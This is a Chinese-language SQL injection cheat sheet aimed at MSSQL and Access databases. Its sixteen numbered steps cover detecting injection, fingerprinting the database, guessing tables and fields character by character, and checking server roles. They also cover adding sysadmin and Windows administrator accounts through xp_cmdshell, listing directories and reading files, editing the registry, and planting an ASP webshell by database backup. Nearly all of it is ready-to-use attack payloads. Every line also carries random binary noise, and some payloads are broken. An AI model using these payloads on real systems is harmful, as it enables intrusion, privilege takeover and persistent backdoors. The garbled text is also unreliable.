1.判断是否有注入;and 1=1 ;and 1=2 �J*��;t{M5
2.初步判断是否是mssql ;and user>0 pH��*L8tT
��-I|y�i'�
3.注入参数是字符'and [查询条件] and ''=' ��t�b=(��L
Ny�~;"�n��
4.搜索时没过滤参数的'and [查询条件] and '%25'=' TQEZ<�B$��
kNjbpC�E\!
5.判断数据库系统 }5�]�NUxQ_
,��{o�ANqP
;and (select count(*) from sysobjects)>0 mssql `#(4�K4]1.
|MRxm"]A
�
;and (select count(*) from msysobjects)>0 access JZ��<O-�G+
@vv`��86bm
UtWoSFZ'o!
!BY=HFT���
6.猜数据库 ;and (select Count(*) from [数据库名])>0 iFH�Vr'Og'
�$:xUX�Ei{
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 e@q[Dv�'mu
+}1]8:>c�q
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 &/�zs�Ix+
*�i\7dJ Dj
9.(1)猜字段的ascii值(access) 3oIo�Qj+D
B0�2~/9*Y"
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 )V>FU=���
r|#4�+��'
(2)猜字段的ascii值(mssql) �\UE9�Ff+{
0}b8S48|�?
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��V�}J��W@
95+}�NJ;r�
10.测试权限结构(mssql) \l[5U3{�
#F9$�"L1Hg
@-7K�~in?^
�1X{A}9n�A
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Z$pR_�dazU
C
qxP�@���
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �x##�Iv�|$
ce;9UBkOg2
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- `"bm �Hs�7
ogPfz/ hw�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- oZ=e/\��[K
G>!�"XK:fB
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- L�r+2L_/v`
7f(UbO@B�D
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ^]v}AEcmW
%]
�Bb;0G
;and 1=(select IS_MEMBER('db_owner'));-- l ��>O]Cpt
"w A�8�J%:
IGp�-`%9��
cg$~.�ytPK
11.添加mssql和系统的帐户 C�{'��c_wX
�!^N/n5eoz
;exec master.dbo.sp_addlogin username;-- �!#�X^nl�c
;exec master.dbo.sp_password null,username,password;-- 6^�w�iEn�A
!�",�@,$��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �� C�Zux�H
7�i'vAOnw^
;exec master.dbo.xp_cmdshell 'net user username password l�E`S�cYG
+I/P5�OGRN
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- aE;!m��od�
&�d*�9#?9
;exec master.dbo.xp_cmdshell 'net user username password /add';-- k�!%Hc�U%J
xWlB!r<}Gz
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- qS7*.E~j|]
A]n�!d�}�?
#{]�=>n�)j
JD'/m
h�N0
12.(1)遍历目录 !k[�zUt��i
�~svu0�[Vx
;create table dirs(paths varchar(100), id int) 2f-Z\3)9 J
;ndg,05�_�
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��sC}/?^�q
-OziUM�1qs
;and (select top 1 paths from dirs)>0 P(Lwpa,S�
{jv1hKTa�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) S#""�((U$�
CsE|�pX�VG
H�P�gMVp'
�D_8hn3FH
(2)遍历目录 Jv7M[SJ#x�
�9�np�<r82
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- W]R�5\�G*�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �gG��$o8c-
�`&+��L�/
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��/wK�7l-S
hqE#BnQxP,
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 +w�io�:�==
?Z.YJX�oKZ
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 JlH|=nIaj6
}��K��Ou��
WT��d})�
s
A8�A+ImwO"
13.mssql中的存储过程 uIba{9tM"P
RJ-CWt
[LG
xp_regenumvalues 注册表根键, 子键 w}�E?FEe.�
1]�����kk�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 w%$n�)7<*
0�lBl�5k�e
xp_regread 根键,子键,键值名 s�G}9��l�1
O��_��:Q#�
;exec xp_regread a�NwDMd�^+
$iB(N ZV��
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ��q&�wMp{�
�`SU;TN0��
xp_regwrite 根键,子键, 值名, 值类型, 值 �AHL�DU�Rv
!YoKKG~�_0
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �"5�e]-�u'
&iSQ2a!l8b
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Mu:H'$�"'H
�C�=��Zuy^
xp_regdeletevalue 根键,子键,值名 Nd�0Wt4=��
�weDv[�b5i
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ��y"]�> Rr
6jn�R�C*!?
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 (z.V�wl��5
G9gv��OEI/
E����x Qld
c.XLE�jV�|
14.mssql的backup创建webshell @e s��lF��
s}�A�]��lY
use model ]~�oM'?&!�
g>Z�1ZK0;M
create table cmd(str image); �<6`,)(�dj
?@u�
&3/�&
insert into cmd(str) values (''); �<.AIV��p�
Zd�ak))�7�
backup database model to disk='c:\l.asp'; �d#W[<,���
!�P�;qc�
h�V�ID~�L$
5-g�0���2g
15.mssql内置函数 !l&lb]V�cz
&fTC�Y-W[
;and (select @@version)>0 获得Windows的版本号 <>R7G)w�
F
��Zaj�<*?\
;and user_name()='dbo' 判断当前系统的连接用户是不是sa d�*G�$qUiX
*[jaI-�~�S
;and (select user_name())>0 爆当前系统的连接用户 i0��R�=P�[
|[�V(��u�
;and (select db_name())>0 得到当前连接的数据库 f]hW�>-B(q
(Hs��f�r�c
.!�`j3�W]�
��^.4<#Q�s
16.简洁的webshell N�f�Se(�rd
NT �n�n!k�
use model Wl�,y�z�nT
Xu
��T|vh
create table cmd(str image); ="4�j�k=on
��G%P]�q�i
insert into cmd(str) values (''); ��'dg ��OE
6-^�+btl)#
backup database model to disk='g:\wwwtest\l.asp';
